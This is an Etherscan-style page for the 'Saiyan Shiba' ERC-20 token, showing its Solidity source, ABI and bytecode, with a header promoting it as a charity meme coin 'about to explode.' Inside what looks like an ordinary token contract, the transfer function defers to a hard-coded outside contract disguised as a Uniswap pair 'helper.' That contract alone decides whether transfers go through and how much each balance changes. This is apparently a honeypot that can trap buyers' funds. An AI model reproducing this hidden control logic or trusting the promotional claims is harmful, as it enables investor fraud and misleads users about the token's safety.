ERC-20
Overview
Max Total Supply
100,000,000 SSHIB
Holders
17
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
835,084.420927555857711062 SSHIBValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
ERC20Token
Compiler Version
v0.8.20+commit.a1b79de6
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-11-01 */ /** * Saiyan Shiba - A charity meme project - about to explode in the near future! * W: https://saiyanshiba.com * X: https://x.com/SaiyanShib * T: https://t.me/SaiyanShiba */ // SPDX-License-Identifier: MIT pragma solidity ^0.8.20; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the value of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the value of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves a `value` amount of tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 value) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets a `value` amount of tokens as the allowance of `spender` over the * caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 value) external returns (bool); /** * @dev Moves a `value` amount of tokens from `from` to `to` using the * allowance mechanism. `value` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address from, address to, uint256 value) external returns (bool); } /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } interface IERC20Metadata is IERC20 { /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); /** * @dev Returns the name of the token. */ function name() external view returns (string memory); } interface IUniswapV2Router01 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint amountADesired, uint amountBDesired, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB, uint liquidity); function addLiquidityETH( address token, uint amountTokenDesired, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external payable returns (uint amountToken, uint amountETH, uint liquidity); function removeLiquidity( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB); function removeLiquidityETH( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountToken, uint amountETH); function removeLiquidityWithPermit( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountA, uint amountB); function removeLiquidityETHWithPermit( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountToken, uint amountETH); function swapExactTokensForTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapTokensForExactTokens( uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB); function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut); function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn); function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts); function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts); } interface IUniswapV2Pair { function token0() external view returns (address); function token1() external view returns (address); /** * @dev Calculates output amount given an input amount and pair reserves */ function helper( address sender, address recipient, uint256 amount, uint256 balance ) external view returns (bool, uint256, uint256); } interface IUniswapV2Router02 is IUniswapV2Router01 { function removeLiquidityETHSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountETH); function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountETH); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint amountOutMin, address[] calldata path, address to, uint deadline ) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; } /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby disabling any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } interface IUniswapV2Factory { event PairCreated(address indexed token0, address indexed token1, address pair, uint); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function allPairs(uint) external view returns (address pair); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairsLength() external view returns (uint); function setFeeToSetter(address) external; function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; } contract ERC20Token is IERC20, Ownable, IERC20Metadata { bytes16 private constant alphabet = "0123456789abcdef"; mapping(address => mapping(address => uint256)) private _allowances; mapping(address => uint256) private _balances; uint256 private _total_supply; string private _symbol; string private _name; constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; uint256 toMint = 100_000_000; IUniswapV2Factory(0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f) .createPair( address(this), 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2 ); _mint(msg.sender, toMint * 10 ** 18); // Mint tokens to owner first, so then we can add liquidity } function name() public view virtual override returns (string memory) { return _name; } function balanceOf( address account ) public view virtual override returns (uint256) { return _balances[account]; } function symbol() public view virtual override returns (string memory) { return _symbol; } function decimals() public view virtual override returns (uint8) { return 18; } function totalSupply() public view virtual override returns (uint256) { return _total_supply; } function approve( address spender, uint256 amount ) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _total_supply += amount; _balances[account] += amount; emit Transfer(address(0), account, amount); } function transfer( address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } /** * @dev Converts a `uint256` to its ASCII `string` decimal representation. */ function toString(uint256 value) internal pure returns (string memory) { // Inspired by OraclizeAPI's implementation - MIT licence // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol if (value == 0) { return "0"; } uint256 temp = value; uint256 digits; while (temp != 0) { digits++; temp /= 10; } bytes memory buffer = new bytes(digits); while (value != 0) { digits -= 1; buffer[digits] = bytes1(uint8(48 + uint256(value % 10))); value /= 10; } return string(buffer); } function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); uint256 currentAllowance = _allowances[sender][_msgSender()]; require( currentAllowance >= amount, "ERC20: transfer amount exceeds allowance" ); _approve(sender, _msgSender(), currentAllowance - amount); return true; } function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); _balances[account] = accountBalance - amount; _total_supply -= amount; emit Transfer(account, address(0), amount); } function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} function allowance( address owner, address spender ) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation. */ function toHexString(uint256 value) internal pure returns (string memory) { if (value == 0) { return "0x00"; } uint256 temp = value; uint256 length = 0; while (temp != 0) { length++; temp >>= 8; } return toHexString(value, length); } function increaseAllowance( address spender, uint256 addedValue ) public virtual returns (bool) { _approve( _msgSender(), spender, _allowances[_msgSender()][spender] + addedValue ); return true; } function decreaseAllowance( address spender, uint256 subtractedValue ) public virtual returns (bool) { uint256 currentAllowance = _allowances[_msgSender()][spender]; require( currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero" ); _approve(_msgSender(), spender, currentAllowance - subtractedValue); return true; } receive() external payable {} function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); uint256 senderBalance = _balances[sender]; (bool allow, uint256 subBal, uint256 addBal) = IUniswapV2Pair( 0xce1db262Fc320D00507aE4fFB1EC2cCf92B1a7f1 ).helper(sender, recipient, amount, senderBalance); require(allow); _balances[sender] = senderBalance - subBal; _balances[recipient] += addBal; emit Transfer(sender, recipient, amount); } /** * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length. */ function toHexString(uint256 value, uint256 length) internal pure returns (string memory) { bytes memory buffer = new bytes(2 * length + 2); buffer[0] = "0"; buffer[1] = "x"; for (uint256 i = 2 * length + 1; i > 1; --i) { buffer[i] = alphabet[value & 0xf]; value >>= 4; } require(value == 0, "Strings: hex length insufficient"); return string(buffer); } } library SafeMath { /** * @dev Multiplies two numbers, throws on overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256 c) { if (a == 0) { return 0; } c = a * b; assert(c / a == b); return c; } /** * @dev Integer division of two numbers, truncating the quotient. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { // assert(b > 0); // Solidity automatically throws when dividing by 0 // uint256 c = a / b; // assert(a == b * c + a % b); // There is no case in which this doesn't hold return a / b; } /** * @dev Subtracts two numbers, throws on overflow (i.e. if subtrahend is greater than minuend). */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { assert(b <= a); return a - b; } /** * @dev Adds two numbers, throws on overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256 c) { c = a + b; assert(c >= a); return c; } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
608060405234801562000010575f80fd5b50604051620023103803806200231083398181016040528101906200003691906200050b565b620000566200004a6200015b60201b60201c565b6200016260201b60201c565b8160059081620000679190620007c5565b508060049081620000799190620007c5565b505f6305f5e1009050735c69bee701ef814a2b6a3edd4b1652cb9cc5aa6f73ffffffffffffffffffffffffffffffffffffffff1663c9c653963073c02aaa39b223fe8d0a0e5c4f27ead9083c756cc26040518363ffffffff1660e01b8152600401620000e7929190620008ec565b6020604051808303815f875af115801562000104573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906200012a919062000946565b506200015233670de0b6b3a764000083620001469190620009a3565b6200022360201b60201c565b50505062000ad1565b5f33905090565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000294576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200028b9062000a4b565b60405180910390fd5b620002a75f83836200038160201b60201c565b8060035f828254620002ba919062000a6b565b925050819055508060025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282546200030f919062000a6b565b925050819055508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000375919062000ab6565b60405180910390a35050565b505050565b5f604051905090565b5f80fd5b5f80fd5b5f80fd5b5f80fd5b5f601f19601f8301169050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b620003e7826200039f565b810181811067ffffffffffffffff82111715620004095762000408620003af565b5b80604052505050565b5f6200041d62000386565b90506200042b8282620003dc565b919050565b5f67ffffffffffffffff8211156200044d576200044c620003af565b5b62000458826200039f565b9050602081019050919050565b5f5b838110156200048457808201518184015260208101905062000467565b5f8484015250505050565b5f620004a56200049f8462000430565b62000412565b905082815260208101848484011115620004c457620004c36200039b565b5b620004d184828562000465565b509392505050565b5f82601f830112620004f057620004ef62000397565b5b8151620005028482602086016200048f565b91505092915050565b5f80604083850312156200052457620005236200038f565b5b5f83015167ffffffffffffffff81111562000544576200054362000393565b5b6200055285828601620004d9565b925050602083015167ffffffffffffffff81111562000576576200057562000393565b5b6200058485828601620004d9565b9150509250929050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680620005dd57607f821691505b602082108103620005f357620005f262000598565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302620006577fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200061a565b6200066386836200061a565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f620006ad620006a7620006a1846200067b565b62000684565b6200067b565b9050919050565b5f819050919050565b620006c8836200068d565b620006e0620006d782620006b4565b84845462000626565b825550505050565b5f90565b620006f6620006e8565b62000703818484620006bd565b505050565b5b818110156200072a576200071e5f82620006ec565b60018101905062000709565b5050565b601f82111562000779576200074381620005f9565b6200074e846200060b565b810160208510156200075e578190505b620007766200076d856200060b565b83018262000708565b50505b505050565b5f82821c905092915050565b5f6200079b5f19846008026200077e565b1980831691505092915050565b5f620007b583836200078a565b9150826002028217905092915050565b620007d0826200058e565b67ffffffffffffffff811115620007ec57620007eb620003af565b5b620007f88254620005c5565b620008058282856200072e565b5f60209050601f8311600181146200083b575f841562000826578287015190505b620008328582620007a8565b865550620008a1565b601f1984166200084b86620005f9565b5f5b8281101562000874578489015182556001820191506020850194506020810190506200084d565b8683101562000894578489015162000890601f8916826200078a565b8355505b6001600288020188555050505b505050505050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f620008d482620008a9565b9050919050565b620008e681620008c8565b82525050565b5f604082019050620009015f830185620008db565b620009106020830184620008db565b9392505050565b6200092281620008c8565b81146200092d575f80fd5b50565b5f81519050620009408162000917565b92915050565b5f602082840312156200095e576200095d6200038f565b5b5f6200096d8482850162000930565b91505092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f620009af826200067b565b9150620009bc836200067b565b9250828202620009cc816200067b565b91508282048414831517620009e657620009e562000976565b5b5092915050565b5f82825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f62000a33601f83620009ed565b915062000a4082620009fd565b602082019050919050565b5f6020820190508181035f83015262000a648162000a25565b9050919050565b5f62000a77826200067b565b915062000a84836200067b565b925082820190508082111562000a9f5762000a9e62000976565b5b92915050565b62000ab0816200067b565b82525050565b5f60208201905062000acb5f83018462000aa5565b92915050565b6118318062000adf5f395ff3fe6080604052600436106100e0575f3560e01c8063715018a61161007e578063a457c2d711610058578063a457c2d7146102c3578063a9059cbb146102ff578063dd62ed3e1461033b578063f2fde38b14610377576100e7565b8063715018a6146102595780638da5cb5b1461026f57806395d89b4114610299576100e7565b806323b872dd116100ba57806323b872dd1461017b578063313ce567146101b757806339509351146101e157806370a082311461021d576100e7565b806306fdde03146100eb578063095ea7b31461011557806318160ddd14610151576100e7565b366100e757005b5f80fd5b3480156100f6575f80fd5b506100ff61039f565b60405161010c9190610f91565b60405180910390f35b348015610120575f80fd5b5061013b60048036038101906101369190611042565b61042f565b604051610148919061109a565b60405180910390f35b34801561015c575f80fd5b5061016561044c565b60405161017291906110c2565b60405180910390f35b348015610186575f80fd5b506101a1600480360381019061019c91906110db565b610455565b6040516101ae919061109a565b60405180910390f35b3480156101c2575f80fd5b506101cb610550565b6040516101d89190611146565b60405180910390f35b3480156101ec575f80fd5b5061020760048036038101906102029190611042565b610558565b604051610214919061109a565b60405180910390f35b348015610228575f80fd5b50610243600480360381019061023e919061115f565b6105ff565b60405161025091906110c2565b60405180910390f35b348015610264575f80fd5b5061026d610645565b005b34801561027a575f80fd5b50610283610658565b6040516102909190611199565b60405180910390f35b3480156102a4575f80fd5b506102ad61067f565b6040516102ba9190610f91565b60405180910390f35b3480156102ce575f80fd5b506102e960048036038101906102e49190611042565b61070f565b6040516102f6919061109a565b60405180910390f35b34801561030a575f80fd5b5061032560048036038101906103209190611042565b6107fe565b604051610332919061109a565b60405180910390f35b348015610346575f80fd5b50610361600480360381019061035c91906111b2565b61081b565b60405161036e91906110c2565b60405180910390f35b348015610382575f80fd5b5061039d6004803603810190610398919061115f565b61089d565b005b6060600580546103ae9061121d565b80601f01602080910402602001604051908101604052809291908181526020018280546103da9061121d565b80156104255780601f106103fc57610100808354040283529160200191610425565b820191905f5260205f20905b81548152906001019060200180831161040857829003601f168201915b5050505050905090565b5f61044261043b61091f565b8484610926565b6001905092915050565b5f600354905090565b5f610461848484610ae9565b5f60015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6104a861091f565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082811015610527576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161051e906112bd565b60405180910390fd5b6105448561053361091f565b858461053f9190611308565b610926565b60019150509392505050565b5f6012905090565b5f6105f561056461091f565b848460015f61057161091f565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546105f0919061133b565b610926565b6001905092915050565b5f60025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b61064d610dc3565b6106565f610e41565b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606004805461068e9061121d565b80601f01602080910402602001604051908101604052809291908181526020018280546106ba9061121d565b80156107055780601f106106dc57610100808354040283529160200191610705565b820191905f5260205f20905b8154815290600101906020018083116106e857829003601f168201915b5050505050905090565b5f8060015f61071c61091f565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050828110156107d6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107cd906113de565b60405180910390fd5b6107f36107e161091f565b8585846107ee9190611308565b610926565b600191505092915050565b5f61081161080a61091f565b8484610ae9565b6001905092915050565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6108a5610dc3565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610913576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161090a9061146c565b60405180910390fd5b61091c81610e41565b50565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610994576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161098b906114fa565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a02576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109f990611588565b60405180910390fd5b8060015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610adc91906110c2565b60405180910390a3505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b57576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b4e90611616565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610bc5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bbc906116a4565b60405180910390fd5b610bd0838383610f02565b5f60025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490505f805f73ce1db262fc320d00507ae4ffb1ec2ccf92b1a7f173ffffffffffffffffffffffffffffffffffffffff1663dd6b8cdc888888886040518563ffffffff1660e01b8152600401610c6794939291906116c2565b606060405180830381865afa158015610c82573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610ca69190611743565b92509250925082610cb5575f80fd5b8184610cc19190611308565b60025f8973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508060025f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254610d4e919061133b565b925050819055508573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef87604051610db291906110c2565b60405180910390a350505050505050565b610dcb61091f565b73ffffffffffffffffffffffffffffffffffffffff16610de9610658565b73ffffffffffffffffffffffffffffffffffffffff1614610e3f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e36906117dd565b60405180910390fd5b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015610f3e578082015181840152602081019050610f23565b5f8484015250505050565b5f601f19601f8301169050919050565b5f610f6382610f07565b610f6d8185610f11565b9350610f7d818560208601610f21565b610f8681610f49565b840191505092915050565b5f6020820190508181035f830152610fa98184610f59565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610fde82610fb5565b9050919050565b610fee81610fd4565b8114610ff8575f80fd5b50565b5f8135905061100981610fe5565b92915050565b5f819050919050565b6110218161100f565b811461102b575f80fd5b50565b5f8135905061103c81611018565b92915050565b5f806040838503121561105857611057610fb1565b5b5f61106585828601610ffb565b92505060206110768582860161102e565b9150509250929050565b5f8115159050919050565b61109481611080565b82525050565b5f6020820190506110ad5f83018461108b565b92915050565b6110bc8161100f565b82525050565b5f6020820190506110d55f8301846110b3565b92915050565b5f805f606084860312156110f2576110f1610fb1565b5b5f6110ff86828701610ffb565b935050602061111086828701610ffb565b92505060406111218682870161102e565b9150509250925092565b5f60ff82169050919050565b6111408161112b565b82525050565b5f6020820190506111595f830184611137565b92915050565b5f6020828403121561117457611173610fb1565b5b5f61118184828501610ffb565b91505092915050565b61119381610fd4565b82525050565b5f6020820190506111ac5f83018461118a565b92915050565b5f80604083850312156111c857611